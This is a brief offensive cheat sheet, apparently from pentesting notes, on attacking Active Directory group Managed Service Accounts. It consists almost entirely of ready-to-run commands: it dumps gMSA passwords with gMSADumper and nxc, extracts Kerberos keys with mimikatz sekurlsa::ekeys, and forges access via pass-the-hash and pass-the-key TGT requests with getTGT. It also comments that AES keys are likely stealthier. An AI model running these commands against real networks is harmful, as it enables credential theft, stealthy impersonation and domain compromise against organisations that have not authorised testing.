gMSA

gMSADumper

python3 gMSADumper.py -u user -p password -d domain.local

Get keys from Mimikatz:

.\mimikatz.exe 'sekurlsa::ekeys' 'exit'
# grab rc4_hmac_nt

Steal the ticket/ pass the keyRequest the TGT with hash

python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>

Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)

python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>

Request the TGT with password

python getTGT.py <domain_name>/<user_name>:[password]

If not provided, password is asked

nxc ldap <host> -u <user> -p <password> --gmsa 

Last updated